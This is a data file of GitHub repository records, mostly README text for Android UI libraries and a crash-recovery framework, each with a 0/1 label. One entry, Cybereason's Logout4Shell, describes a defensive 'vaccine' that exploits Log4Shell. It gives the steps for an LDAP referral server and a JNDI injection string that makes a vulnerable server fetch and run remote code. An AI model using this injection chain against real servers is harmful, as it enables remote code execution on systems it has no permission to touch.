full_name
stringlengths
7
104
description
stringlengths
4
725
topics
stringlengths
3
468
readme
stringlengths
13
565k
label
int64
0
1
heysupratim/material-daterange-picker
A material Date Range Picker based on wdullaers MaterialDateTimePicker
datepicker datetimepicker material picker range-selection timepicker
[![Android Arsenal](https://img.shields.io/badge/Android%20Arsenal-MaterialDateRangePicker-brightgreen.svg?style=flat)](http://android-arsenal.com/details/1/2501) [ ![Download](https://api.bintray.com/packages/borax12/maven/material-datetime-rangepicker/images/download.svg) ](https://bintray.com/borax12/maven/material-datetime-rangepicker/_latestVersion) [![Maven Central](https://maven-badges.herokuapp.com/maven-central/com.borax12.materialdaterangepicker/library/badge.svg)](https://maven-badges.herokuapp.com/maven-central/com.borax12.materialdaterangepicker/library) Material Date and Time Picker with Range Selection ====================================================== Credits to the original amazing material date picker library by wdullaer - https://github.com/wdullaer/MaterialDateTimePicker ## Adding to your project Add the jcenter repository information in your build.gradle file like this ```java repositories { jcenter() } dependencies { implementation 'com.borax12.materialdaterangepicker:library:2.0' } ``` Beginning Version 2.0 now also available on Maven Central ## Date Selection ![FROM](/screenshots/2.png?raw=true) ![TO](/screenshots/1.png?raw=true) ## Time Selection ![FROM](/screenshots/3.png?raw=true) ![TO](/screenshots/4.png?raw=true) Support for Android 4.0 and up. From the original library documentation - You may also add the library as an Android Library to your project. All the library files live in ```library```. Using the Pickers -------------------------------- 1. Implement an `OnDateSetListener` or `OnTimeSetListener` 2. Create a ``DatePickerDialog` using the supplied factory ### Implement an `OnDateSetListener` In order to receive the date set in the picker, you will need to implement the `OnDateSetListener` interfaces. Typically this will be the `Activity` or `Fragment` that creates the Pickers. or ### Implement an `OnTimeSetListener` In order to receive the time set in the picker, you will need to implement the `OnTimeSetListener` interfaces. Typically this will be the `Activity` or `Fragment` that creates the Pickers. ```java //new onDateSet @Override public void onDateSet(DatePickerDialog view, int year, int monthOfYear, int dayOfMonth,int yearEnd, int monthOfYearEnd, int dayOfMonthEnd) { } @Override public void onTimeSet(DatePickerDialog view, int year, int monthOfYear, int dayOfMonth,int yearEnd, int monthOfYearEnd, int dayOfMonthEnd) { String hourString = hourOfDay < 10 ? "0"+hourOfDay : ""+hourOfDay; String minuteString = minute < 10 ? "0"+minute : ""+minute; String hourStringEnd = hourOfDayEnd < 10 ? "0"+hourOfDayEnd : ""+hourOfDayEnd; String minuteStringEnd = minuteEnd < 10 ? "0"+minuteEnd : ""+minuteEnd; String time = "You picked the following time: From - "+hourString+"h"+minuteString+" To - "+hourStringEnd+"h"+minuteStringEnd; timeTextView.setText(time); } ``` ### Create a DatePickerDialog` using the supplied factory You will need to create a new instance of `DatePickerDialog` using the static `newInstance()` method, supplying proper default values and a callback. Once the dialogs are configured, you can call `show()`. ```java Calendar now = Calendar.getInstance(); DatePickerDialog dpd = DatePickerDialog.newInstance( MainActivity.this, now.get(Calendar.YEAR), now.get(Calendar.MONTH), now.get(Calendar.DAY_OF_MONTH) ); dpd.show(getFragmentManager(), "Datepickerdialog"); ``` ### Create a TimePickerDialog` using the supplied factory You will need to create a new instance of `TimePickerDialog` using the static `newInstance()` method, supplying proper default values and a callback. Once the dialogs are configured, you can call `show()`. ```java Calendar now = Calendar.getInstance(); TimePickerDialog tpd = TimePickerDialog.newInstance( MainActivity.this, now.get(Calendar.HOUR_OF_DAY), now.get(Calendar.MINUTE), false ); tpd.show(getFragmentManager(), "Timepickerdialog"); ``` For other documentation regarding theming , handling orientation changes , and callbacks - check out the original documentation - https://github.com/wdullaer/MaterialDateTimePicker
0
Cybereason/Logout4Shell
Use Log4Shell vulnerability to vaccinate a victim server against Log4Shell
null
# Logout4Shell ![logo](https://github.com/Cybereason/Logout4Shell/raw/main/assets/CR_logo.png) ## Description A vulnerability impacting Apache Log4j versions 2.0 through 2.14.1 was disclosed on the project’s Github on December 9, 2021. The flaw has been dubbed “Log4Shell,”, and has the highest possible severity rating of 10. Software made or managed by the Apache Software Foundation (From here on just "Apache") is pervasive and comprises nearly a third of all web servers in the world—making this a potentially catastrophic flaw. The Log4Shell vulnerability CVE-2021-44228 was published on 12/9/2021 and allows remote code execution on vulnerable servers. While the best mitigation against these vulnerabilities is to patch log4j to ~~2.15.0~~2.17.0 and above, in Log4j version (>=2.10) this behavior can be partially mitigated (see below) by setting system property `log4j2.formatMsgNoLookups` to `true` or by removing the JndiLookup class from the classpath. On 12/14/2021 the Apache software foundation disclosed CVE-2021-45046 which was patched in log4j version 2.16.0. This vulnerability showed that in certain scenarios, for example, where attackers can control a thread-context variable that gets logged, even the flag `log4j2.formatMsgNoLookups` is insufficient to mitigate log4shell. An additional CVE, less severe, CVE-2021-45105 was discovered. This vulnerability exposes the server to an infinite recursion that could crash the server is some scenarios. It is recommened to upgrade to 2.17.0 However, enabling these system property requires access to the vulnerable servers as well as a restart. The [Cybereason](https://www.cybereason.com) research team has developed the following code that _exploits_ the same vulnerability and the payload therein sets the vulnerable setting as disabled. The payload then searches for all `LoggerContext` and removes the JNDI `Interpolator` preventing even recursive abuses. this effectively blocks any further attempt to exploit Log4Shell on this server. This Proof of Concept is based on [@tangxiaofeng7](https://github.com/tangxiaofeng7)'s [tangxiaofeng7/apache-log4j-poc](https://github.com/tangxiaofeng7/apache-log4j-poc) However, this project attempts to fix the vulnerability by using the bug against itself. You can learn more about Cybereason's "vaccine" approach to the Apache Log4Shell vulnerability (CVE-2021-44228) on our website. Learn more: [Cybereason Releases Vaccine to Prevent Exploitation of Apache Log4Shell Vulnerability (CVE-2021-44228)](https://www.cybereason.com/blog/cybereason-releases-vaccine-to-prevent-exploitation-of-apache-log4shell-vulnerability-cve-2021-44228) ## Supported versions Logout4Shell supports log4j version 2.0 - 2.14.1 ## How it works On versions (>= 2.10.0) of log4j that support the configuration `FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS`, this value is set to `True` disabling the lookup mechanism entirely. As disclosed in CVE-2021-45046, setting this flag is insufficient, therefore the payload searches all existing `LoggerContexts` and removes the JNDI key from the `Interpolator` used to process `${}` fields. This means that even other recursive uses of the JNDI mechanisms will fail. Then, the log4j jarfile will be remade and patched. The patch is included in this git repository, however it is not needed in the final build because the real patch is included in the payload as Base64. In persistence mode (see [below](#transient-vs-persistent-mode)), the payload additionally attempts to locate the `log4j-core.jar`, remove the `JndILookup` class, and modify the PluginCache to completely remove the JNDI plugin. Upon subsequent JVM restarts the `JndiLookup` class cannot be found and log4j will not support for JNDI ## Transient vs Persistent mode This package generates two flavors of the payload - Transient and Persistent. In Transient mode, the payload modifies the current running JVM. The payload is very delicate to just touch the logger context and configuration. We thus believe the risk of using the Transient mode are very low on production environments. Persistent mode performs all the changes of the Transient mode and *in addition* searches for the jar from which `log4j` loads the `JndiLookup` class. It then attempts to modify this jar by removing the `JndiLookup` class as well as modifying the plugin registry. There is inherently more risk in this approach as if the `log4j-core.jar` becomes corrupted, the JVM may crash on start. The choice of which mode to use is selected by the URL given in step [2.3](#execution) below. The class `Log4jRCETransient` selects the Transient Mode and the class `Log4jRCEPersistent` selects the persistent mode Persistent mode is based on the work of [TudbuT](https://github.com/TudbuT). Thank you! ## How to use 1. Download this repository and build it 1.1 `git clone https://github.com/cybereason/Logout4Shell.git` 1.2 build it - `mvn package` 1.3 `cd target/classes` 1.4 run the webserver - `python3 -m http.server 8888` 2. Download, build and run Marshalsec's ldap server 2.1 `git clone https://github.com/mbechler/marshalsec.git` 2.2 `mvn package -DskipTests` 2.3 `cd target` 2.4 <a name="execution"></a>`java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://<IP_OF_PYTHON_SERVER_FROM_STEP_1>:8888/#Log4jRCE<Transient/Persistent>"` 4. To immunize a server 3.1 enter `${jndi:ldap://<IP_OF_LDAP_SERVER_FROM_STEP_2>:1389/a}` into a vulnerable field (such as user name) ## DISCLAIMER: The code described in this advisory (the “Code”) is provided on an “as is” and “as available” basis may contain bugs, errors and other defects. You are advised to safeguard important data and to use caution. By using this Code, you agree that Cybereason shall have no liability to you for any claims in connection with the Code. Cybereason disclaims any liability for any direct, indirect, incidental, punitive, exemplary, special or consequential damages, even if Cybereason or its related parties are advised of the possibility of such damages. Cybereason undertakes no duty to update the Code or this advisory. ## License The source code for the site is licensed under the MIT license, which you can find in the LICENSE file.
0
DingMouRen/PaletteImageView
懂得智能配色的ImageView,还能给自己设置多彩的阴影哦。(Understand the intelligent color matching ImageView, but also to set their own colorful shadow Oh!)
null
![image](https://github.com/DingMouRen/PaletteImageView/raw/master/screenshot/p1.png)  ### English Readme [English Version](https://github.com/hasanmohdkhan/PaletteImageView/blob/master/README%20English.md) (Thank you, [hasanmohdkhan](https://github.com/hasanmohdkhan)) ### 简介 * 可以解析图片中的主色调,**默认将主色调作为控件阴影的颜色** * 可以**自定义设置控件的阴影颜色** * 可以**控制控件四个角的圆角大小**(如果控件设置成正方向,随着圆角半径增大,可以将控件变成圆形) * 可以**控制控件的阴影半径大小** * 可以分别**控制阴影在x方向和y方向上的偏移量** * 可以将图片中的颜色解析出**六种主题颜色**,每一种主题颜色都有相应的**匹配背景、标题、正文的推荐颜色** ### build.gradle中引用 ``` compile 'com.dingmouren.paletteimageview:paletteimageview:1.0.7' ```                  ![image](https://github.com/DingMouRen/PaletteImageView/raw/master/screenshot/title.gif) ##### 1.参数的控制 圆角半径|阴影模糊范围|阴影偏移量 ---|---|--- ![image](https://github.com/DingMouRen/PaletteImageView/raw/master/screenshot/demo1.gif) | ![image](https://github.com/DingMouRen/PaletteImageView/raw/master/screenshot/demo2.gif) | ![image](https://github.com/DingMouRen/PaletteImageView/raw/master/screenshot/demo3.gif) ##### 2.阴影颜色默认是图片的主色调                    ![image](https://github.com/DingMouRen/PaletteImageView/raw/master/screenshot/demo4.gif) ![image](https://github.com/DingMouRen/PaletteImageView/raw/master/screenshot/p2.png) ##### 3.图片颜色主题解析 ![image](https://github.com/DingMouRen/PaletteImageView/raw/master/screenshot/p3.png) ### 使用 ``` <com.dingmouren.paletteimageview.PaletteImageView android:id="@+id/palette" android:layout_width="match_parent" android:layout_height="wrap_content" app:palettePadding="20dp" app:paletteOffsetX="15dp" app:paletteOffsetY="15dp" /> mPaletteImageView.setOnParseColorListener(new PaletteImageView.OnParseColorListener() { @Override//解析图片的颜色完毕 public void onComplete(PaletteImageView paletteImageView) { int[] vibrant = paletteImageView.getVibrantColor(); int[] vibrantDark = paletteImageView.getDarkVibrantColor(); int[] vibrantLight = paletteImageView.getLightVibrantColor(); int[] muted = paletteImageView.getMutedColor(); int[] mutedDark = paletteImageView.getDarkMutedColor(); int[] mutedLight = paletteImageView.getLightMutedColor(); } @Override//解析图片的颜色失败 public void onFail() { } }); ``` ### xml属性 xml属性 | 描述 ---|--- app:palettePadding | **表示阴影显示最大空间距离。值为0,没有阴影,大于0,才有阴影。** app:paletteOffsetX | 表示阴影在x方向上的偏移量 app:paletteOffsetY | 表示阴影在y方向上的偏移量 app:paletteSrc | 表示图片资源 app:paletteRadius | 表示圆角半径 app:paletteShadowRadius | 表示阴影模糊范围 ### 公共的方法 方法 | 描述 ---|--- public void setShadowColor(int color) | 表示自定义设置控件阴影的颜色 public void setBitmap(Bitmap bitmap) | 表示设置控件位图 public void setPaletteRadius(int raius) | 表示设置控件圆角半径 public void setPaletteShadowOffset(int offsetX, int offsetY) | 表示设置阴影在控件阴影在x方向 或 y方向上的偏移量 public void setPaletteShadowRadius(int radius) | 表示设置控件阴影模糊范围 public void setOnParseColorListener(OnParseColorListener listener) | 设置控件解析图片颜色的监听器 public int[] getVibrantColor() | 表示获取Vibrant主题的颜色数组;假设颜色数组为arry,arry[0]是推荐标题使用的颜色,arry[1]是推荐正文使用的颜色,arry[2]是推荐背景使用的颜色。颜色只是用于推荐,可以自行选择 public int[] getDarkVibrantColor()| 表示获取DarkVibrant主题的颜色数组,数组元素含义同上 public int[] getLightVibrantColor()| 表示获取LightVibrant主题的颜色数组,数组元素含义同上 public int[] getMutedColor()| 表示获取Muted主题的颜色数组,数组元素含义同上 public int[] getDarkMutedColor()| 表示获取DarkMuted主题的颜色数组,数组元素含义同上 public int[] getLightMutedColor()| 表示获取LightMuted主题的颜色数组,数组元素含义同上 <br>此项目已暂停维护<br>
0
totond/TextPathView
A View with text path animation!
null
# TextPathView ![](https://img.shields.io/badge/JCenter-0.2.1-brightgreen.svg) <figure class="half"> <img src="https://github.com/totond/MyTUKU/blob/master/textdemo1.gif?raw=true"> <img src="https://github.com/totond/MyTUKU/blob/master/text1.gif?raw=true"> </figure> > [Go to the English README](https://github.com/totond/TextPathView/blob/master/README-en.md) ## 介绍   TextPathView是一个把文字转化为路径动画然后展现出来的自定义控件。效果如上图。 > 这里有[原理解析!](https://juejin.im/post/5a9677b16fb9a063375765ad) ### v0.2.+重要更新 - 现在不但可以控制文字路径结束位置end,还可以控制开始位置start,如上图二 - 可以通过PathCalculator的子类来控制实现一些字路径变化,如下面的MidCalculator、AroundCalculator、BlinkCalculator - 可以通知直接设置FillColor属性来控制结束时是否填充颜色 ![TextPathView v0.2.+](https://raw.githubusercontent.com/totond/MyTUKU/master/textpathnew1.png) ## 使用   主要的使用流程就是输入文字,然后设置一些动画的属性,还有画笔特效,最后启动就行了。想要自己控制绘画的进度也可以,详情见下面。 ### Gradle ``` compile 'com.yanzhikai:TextPathView:0.2.1' ``` > minSdkVersion 16 > 如果遇到播放完后消失的问题,请关闭硬件加速,可能是硬件加速对`drawPath()`方法不支持 ### 使用方法 #### TextPathView   TextPathView分为两种,一种是每个笔画按顺序刻画的SyncTextPathView,一种是每个笔画同时刻画的AsyncTextPathView,使用方法都是一样,在xml里面配置属性,然后直接在java里面调用startAnimation()方法就行了,具体的可以看例子和demo。下面是一个简单的例子: xml里面: ``` <yanzhikai.textpath.SyncTextPathView android:id="@+id/stpv_2017" android:layout_width="match_parent" android:layout_height="wrap_content" app:duration="12000" app:showPainter="true" app:text="2017" app:textInCenter="true" app:textSize="60sp" android:layout_weight="1" /> <yanzhikai.textpath.AsyncTextPathView android:id="@+id/atpv_1" android:layout_width="wrap_content" android:layout_height="wrap_content" app:duration="12000" app:showPainter="true" app:text="炎之铠" app:textStrokeColor="@android:color/holo_orange_light" app:textInCenter="true" app:textSize="62sp" android:layout_gravity="center_horizontal" /> ``` java里面使用: ``` atpv1 = findViewById(R.id.atpv_1); stpv_2017 = findViewById(R.id.stpv_2017); //从无到显示 atpv1.startAnimation(0,1); //从显示到消失 stpv_2017.startAnimation(1,0); ``` 还可以通过控制进度,来控制TextPathView显示,这里用SeekBar: ``` sb_progress.setOnSeekBarChangeListener(new SeekBar.OnSeekBarChangeListener() { @Override public void onProgressChanged(SeekBar seekBar, int progress, boolean fromUser) { atpv1.drawPath(progress / 1000f); stpv_2017.drawPath(progress / 1000f); } } ``` #### PathView   PathView是0.1.1版本之后新增的,拥有三个子类TextPathView、SyncPathView和AsyncPathView,前者上面有介绍是文字的路径,后面这两个就是图形的路径,必须要输入一个Path类,才能正常运行: ``` public class TestPath extends Path { public TestPath(){ init(); } private void init() { addCircle(350,300,150,Direction.CCW); addCircle(350,300,100,Direction.CW); addCircle(350,300,50,Direction.CCW); moveTo(350,300); lineTo(550,500); } } ``` ``` //必须先调用setPath设置路径 aspv.setPath(new TestPath()); aspv.startAnimation(0,1); ``` ![](https://github.com/totond/MyTUKU/blob/master/textdemo2.gif?raw=true)   (录屏可能有些问题,实际上是没有背景色的)上面就是SyncPathView和AsyncPathView效果,区别和文字路径是一样的。 ### 属性 |**属性名称**|**意义**|**类型**|**默认值**| |--|--|:--:|:--:| |textSize | 文字的大小size | integer| 108 | |text | 文字的具体内容 | String| Test| |autoStart| 是否加载完后自动启动动画 | boolean| false| |showInStart| 是否一开始就把文字全部显示 | boolean| false| |textInCenter| 是否让文字内容处于控件中心 | boolean| false| |duration | 动画的持续时间,单位ms | integer| 10000| |showPainter | 在动画执行的时候是否执行画笔特效 | boolean| false| |showPainterActually| 在所有时候是否展示画笔特效| boolean| false| |~~textStrokeWidth~~ strokeWidth | 路径刻画的线条粗细 | dimension| 5px| |~~textStrokeColor~~ pathStrokeColor| 路径刻画的线条颜色 | color| Color.black| |paintStrokeWidth | 画笔特效刻画的线条粗细 | dimension| 3px| |paintStrokeColor | 画笔特效刻画的线条颜色 | color| Color.black| |repeat| 是否重复播放动画,重复类型| enum | NONE| |fillColor| 文字动画结束时是否填充颜色 | boolean | false | |**repeat属性值**|**意义**| |--|--| |NONE|不重复播放| |RESTART|动画从头重复播放| |REVERSE|动画从尾重复播放| > PS:showPainterActually属性,由于动画绘画完毕应该将画笔特效消失,所以每次执行完动画都会自动设置为false。因此最好用于使用非自带动画的时候。 ### 方法 #### 画笔特效 ``` //设置画笔特效 public void setPainter(SyncPathPainter painter); //设置画笔特效 public void setPainter(SyncPathPainter painter); ```   因为绘画的原理不一样,画笔特效也分两种: ``` public interface SyncPathPainter extends PathPainter { //开始动画的时候执行 void onStartAnimation(); /** * 绘画画笔特效时候执行 * @param x 当前绘画点x坐标 * @param y 当前绘画点y坐标 * @param paintPath 画笔Path对象,在这里画出想要的画笔特效 */ @Override void onDrawPaintPath(float x, float y, Path paintPath); } public interface AsyncPathPainter extends PathPainter { /** * 绘画画笔特效时候执行 * @param x 当前绘画点x坐标 * @param y 当前绘画点y坐标 * @param paintPath 画笔Path对象,在这里画出想要的画笔特效 */ @Override void onDrawPaintPath(float x, float y, Path paintPath); } ```   看名字就知道是对应哪一个了,想要自定义画笔特效的话就可以实现上面之中的一个或者两个接口来自己画啦。   另外,还有里面已经自带了3种画笔特效,可供参考和使用(关于这些画笔特效的实现,可以参考[原理解析](http://blog.csdn.net/totond/article/details/79375200)): ``` //箭头画笔特效,根据传入的当前点与上一个点之间的速度方向,来调整箭头方向 public class ArrowPainter implements SyncPathPainter { //一支笔的画笔特效,就是在绘画点旁边画多一支笔 public class PenPainter implements SyncPathPainter,AsyncPathPainter { //火花特效,根据箭头引申变化而来,根据当前点与上一个点算出的速度方向来控制火花的方向 public class FireworksPainter implements SyncPathPainter { ```   由上面可见,因为烟花和箭头画笔特效都需要记录上一个点的位置,所以只适合按顺序绘画的SyncTextPathView,而PenPainter就适合两种TextPathView。仔细看它的代码的话,会发现画起来都是很简单的哦。 #### 自定义画笔特效   自定义画笔特效也是非常简单的,原理就是在当前绘画点上加上一个附加的Path,实现SyncPathPainter和AsyncPathPainter之中的一个或者两个接口,重写里面的`onDrawPaintPath(float x, float y, Path paintPath)`方法就行了,如下面这个: ``` atpv2.setPathPainter(new AsyncPathPainter() { @Override public void onDrawPaintPath(float x, float y, Path paintPath) { paintPath.addCircle(x,y,6, Path.Direction.CCW); } }); ``` ![](https://github.com/totond/MyTUKU/blob/master/textdemo3.gif?raw=true) #### 动画监听 ``` //设置自定义动画监听 public void setAnimatorListener(PathAnimatorListener animatorListener); ```   PathAnimatorListener是实现了AnimatorListener接口的类,继承它的时候注意不要删掉super父类方法,因为里面可能有一些操作。 #### 画笔获取 ``` //获取绘画文字的画笔 public Paint getDrawPaint() { return mDrawPaint; } //获取绘画画笔特效的画笔 public Paint getPaint() { return mPaint; } ``` #### 控制绘画 ``` /** * 绘画文字路径的方法 * * @param start 路径开始点百分比 * @param end 路径结束点百分比 */ public abstract void drawPath(float start, float end); /** * 开始绘制路径动画 * @param start 路径比例,范围0-1 * @param end 路径比例,范围0-1 */ public void startAnimation(float start, float end); /** * 绘画路径的方法 * @param progress 绘画进度,0-1 */ public void drawPath(float progress); /** * Stop animation */ public void stopAnimation(); /** * Pause animation */ @RequiresApi(api = Build.VERSION_CODES.KITKAT) public void pauseAnimation(); /** * Resume animation */ @RequiresApi(api = Build.VERSION_CODES.KITKAT) public void resumeAnimation(); ``` #### 填充颜色 ``` //直接显示填充好颜色了的全部文字 public void showFillColorText(); //设置动画播放完后是否填充颜色 public void setFillColor(boolean fillColor) ```   由于正在绘画的时候文字路径不是封闭的,填充颜色会变得很混乱,所以这里给出`showFillColorText()`来设置直接显示填充好颜色了的全部文字,一般可以在动画结束后文字完全显示后过渡填充 ![](https://github.com/totond/MyTUKU/blob/master/textdemo4.gif?raw=true) #### 取值计算器 ​ 0.2.+版本开始,加入了取值计算器PathCalculator,可以通过`setCalculator(PathCalculator calculator)`方法设置。PathCalculator可以控制路径的起点start和终点end属性在不同progress对应的取值。TextPathView自带一些PathCalculator子类: - **MidCalculator** start和end从0.5开始往两边扩展: ![MidCalculator](https://github.com/totond/MyTUKU/blob/master/text4.gif?raw=true) - **AroundCalculator** start会跟着end增长,end增长到0.75后start会反向增长 ![AroundCalculator](https://github.com/totond/MyTUKU/blob/master/text5.gif?raw=true) - **BlinkCalculator** start一直为0,end自然增长,但是每增加几次会有一次end=1,造成闪烁 ![BlinkCalculator](https://github.com/totond/MyTUKU/blob/master/text2.gif?raw=true) - **自定义PathCalculator:**用户可以通过继承抽象类PathCalculator,通过里面的`setStart(float start)`和`setEnd(float end)`,具体可以参考上面几个自带的PathCalculator实现代码。 #### 其他 ``` //设置文字内容 public void setText(String text); //设置路径,必须先设置好路径在startAnimation(),不然会报错! public void setPath(Path path) ; //设置字体样式 public void setTypeface(Typeface typeface); //清除画面 public void clear(); //设置动画时能否显示画笔效果 public void setShowPainter(boolean showPainter); //设置所有时候是否显示画笔效果,由于动画绘画完毕应该将画笔特效消失,所以每次执行完动画都会自动设置为false public void setCanShowPainter(boolean canShowPainter); //设置动画持续时间 public void setDuration(int duration); //设置重复方式 public void setRepeatStyle(int repeatStyle); //设置Path开始结束取值的计算器 public void setCalculator(PathCalculator calculator) ``` ## 更新 - 2018/03/08 **version 0.0.5**: - 增加了`showFillColorText()`方法来设置直接显示填充好颜色了的全部文字。 - 把PathAnimatorListener从TextPathView的内部类里面解放出来,之前使用太麻烦了。 - 增加`showPainterActually`属性,设置所有时候是否显示画笔效果,由于动画绘画完毕应该将画笔特效消失,所以每次执行完动画都会自动将它设置为false。因此它用处就是在不使用自带Animator的时候显示画笔特效。 - 2018/03/08 **version 0.0.6**: - 增加了`stop(), pause(), resume()`方法来控制动画。之前是觉得让使用者自己用Animator实现就好了,现在一位外国友人[toanvc](https://github.com/toanvc)提交的PR封装好了,我稍作修改,不过后两者使用时API要大于等于19。 - 增加了`repeat`属性,让动画支持重复播放,也是[toanvc](https://github.com/toanvc)同学的PR。 - 2018/03/18 **version 0.1.0**: - 重构代码,加入路径动画SyncPathView和AsyncPathView,把总父类抽象为PathView - 增加`setDuration()`、`setRepeatStyle()` - 修改一系列名字如下: |Old Name|New Name| |---|---| |TextPathPainter|PathPainter| |SyncTextPainter|SyncPathPainter| |AsyncTextPainter|AsyncPathPainter| |TextAnimatorListener|PathAnimatorListener| - 2018/03/21 **version 0.1.2**: - 修复高度warp_content时候内容有可能显示不全 - 原来PathMeasure获取文字Path时候,最后会有大概一个像素的缺失,现在只能在onDraw判断progress是否为1来显示完全路径(但是这样可能会导致硬件加速上显示不出来,需要手动关闭这个View的硬件加速) - 增加字体设置 - 支持自动换行 ![](https://github.com/totond/MyTUKU/blob/master/textdemo5.gif?raw=true) - 2018/09/09 **version 0.1.3**: - 默认关闭此控件的硬件加速 - 加入内存泄漏控制 - 准备后续优化 - 2019/04/04 **version 0.2.1**: - 现在不但可以控制文字路径结束位置end,还可以控制开始位置start - 可以通过PathCalculator的子类来控制实现一些字路径变化,如上面的MidCalculator、AroundCalculator、BlinkCalculator - 可以通知直接设置FillColor属性来控制结束时是否填充颜色 - 硬件加速问题解决,默认打开 - 去除无用log和报错 #### 后续将会往下面的方向努力: - 更多的特效,更多的动画,如果有什么想法和建议的欢迎issue提出来一起探讨,还可以提交PR出一份力。 - 更好的性能,目前单个TextPathView在模拟器上运行动画时是不卡的,多个就有一点点卡顿了,在性能较好的真机多个也是没问题的,这个性能方面目前还没头绪。 - 文字换行符支持。 - Path的宽高测量(包含空白,从坐标(0,0)开始) ## 贡献代码   如果想为TextPathView的完善出一份力的同学,欢迎提交PR: - 首先请创建一个分支branch。 - 如果加入新的功能或者效果,请不要覆盖demo里面原来用于演示Activity代码,如FristActivity里面的实例,可以选择新增一个Activity做演示测试,或者不添加演示代码。 - 如果修改某些功能或者代码,请附上合理的依据和想法。 - 翻译成English版README(暂时没空更新英文版) ## 开源协议   TextPathView遵循MIT协议。 ## 关于作者 > id:炎之铠 > 炎之铠的邮箱:yanzhikai_yjk@qq.com > CSDN:http://blog.csdn.net/totond
0
unofficial-openjdk/openjdk
Do not send pull requests! Automated Git clone of various OpenJDK branches
null
This repository is no longer actively updated. Please see https://github.com/openjdk for a much better mirror of OpenJDK!
0
Sunzxyong/Recovery
a crash recovery framework.(一个App异常恢复框架)
application-crash crash crash-recovery-framework recovery restore
# **Recovery** A crash recovery framework! ---- [ ![Download](https://api.bintray.com/packages/sunzxyong/maven/Recovery/images/download.svg) ](https://bintray.com/sunzxyong/maven/Recovery/_latestVersion) ![build](https://img.shields.io/badge/build-passing-blue.svg) [![License](https://img.shields.io/hexpm/l/plug.svg)](https://github.com/Sunzxyong/Recovery/blob/master/LICENSE) [中文文档](https://github.com/Sunzxyong/Recovery/blob/master/README-Chinese.md) # **Introduction** [Blog entry with introduction](http://zhengxiaoyong.com/2016/09/05/Android%E8%BF%90%E8%A1%8C%E6%97%B6Crash%E8%87%AA%E5%8A%A8%E6%81%A2%E5%A4%8D%E6%A1%86%E6%9E%B6-Recovery) “Recovery” can help you to automatically handle application crash in runtime. It provides you with following functionality: * Automatic recovery activity with stack and data; * Ability to recover to the top activity; * A way to view and save crash info; * Ability to restart and clear the cache; * Allows you to do a restart instead of recovering if failed twice in one minute. # **Art** ![recovery](http://7xswxf.com2.z0.glb.qiniucdn.com//blog/recovery.jpg) # **Usage** ## **Installation** **Using Gradle** ```gradle implementation 'com.zxy.android:recovery:1.0.0' ``` or ```gradle debugImplementation 'com.zxy.android:recovery:1.0.0' releaseImplementation 'com.zxy.android:recovery-no-op:1.0.0' ``` **Using Maven** ```xml <dependency> <groupId>com.zxy.android</groupId> <artifactId>recovery</artifactId> <version>1.0.0</version> <type>pom</type> </dependency> ``` ## **Initialization** You can use this code sample to initialize Recovery in your application: ```java Recovery.getInstance() .debug(true) .recoverInBackground(false) .recoverStack(true) .mainPage(MainActivity.class) .recoverEnabled(true) .callback(new MyCrashCallback()) .silent(false, Recovery.SilentMode.RECOVER_ACTIVITY_STACK) .skip(TestActivity.class) .init(this); ``` If you don't want to show the RecoveryActivity when the application crash in runtime,you can use silence recover to restore your application. You can use this code sample to initialize Recovery in your application: ```java Recovery.getInstance() .debug(true) .recoverInBackground(false) .recoverStack(true) .mainPage(MainActivity.class) .recoverEnabled(true) .callback(new MyCrashCallback()) .silent(true, Recovery.SilentMode.RECOVER_ACTIVITY_STACK) .skip(TestActivity.class) .init(this); ``` If you only need to display 'RecoveryActivity' page in development to obtain the debug data, and in the online version does not display, you can set up `recoverEnabled(false);` ## **Arguments** | Argument | Type | Function | | :-: | :-: | :-: | | debug | boolean | Whether to open the debug mode | | recoverInBackgroud | boolean | When the App in the background, whether to restore the stack | | recoverStack | boolean | Whether to restore the activity stack, or to restore the top activity | | mainPage | Class<? extends Activity> | Initial page activity | | callback | RecoveryCallback | Crash info callback | | silent | boolean,SilentMode | Whether to use silence recover,if true it will not display RecoveryActivity and restore the activity stack automatically | **SilentMode** > 1. RESTART - Restart App > 2. RECOVER_ACTIVITY_STACK - Restore the activity stack > 3. RECOVER_TOP_ACTIVITY - Restore the top activity > 4. RESTART_AND_CLEAR - Restart App and clear data ## **Callback** ```java public interface RecoveryCallback { void stackTrace(String stackTrace); void cause(String cause); void exception( String throwExceptionType, String throwClassName, String throwMethodName, int throwLineNumber ); void throwable(Throwable throwable); } ``` ## **Custom Theme** You can customize UI by setting these properties in your styles file: ```xml <color name="recovery_colorPrimary">#2E2E36</color> <color name="recovery_colorPrimaryDark">#2E2E36</color> <color name="recovery_colorAccent">#BDBDBD</color> <color name="recovery_background">#3C4350</color> <color name="recovery_textColor">#FFFFFF</color> <color name="recovery_textColor_sub">#C6C6C6</color> ``` ## **Crash File Path** > {SDCard Dir}/Android/data/{packageName}/files/recovery_crash/ ---- ## **Update history** * `VERSION-0.0.5`——**Support silent recovery** * `VERSION-0.0.6`——**Strengthen the protection of silent restore mode** * `VERSION-0.0.7`——**Add confusion configuration** * `VERSION-0.0.8`——**Add the skip Activity features,method:skip()** * `VERSION-0.0.9`——**Update the UI and solve some problems** * `VERSION-0.1.0`——**Optimization of crash exception delivery, initial Recovery framework can be in any position, release the official version-0.1.0** * `VERSION-0.1.3`——**Add 'no-op' support** * `VERSION-0.1.4`——**update default theme** * `VERSION-0.1.5`——**fix 8.0+ hook bug** * `VERSION-0.1.6`——**update** * `VERSION-1.0.0`——**Fix 8.0 compatibility issue** ## **About** * **Blog**:[https://zhengxiaoyong.com](https://zhengxiaoyong.com) * **Wechat**: ![](https://raw.githubusercontent.com/Sunzxyong/ImageRepository/master/qrcode.jpg) # **LICENSE** ``` Copyright 2016 zhengxiaoyong Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. ```
0
Netflix/servo
Netflix Application Monitoring Library
null
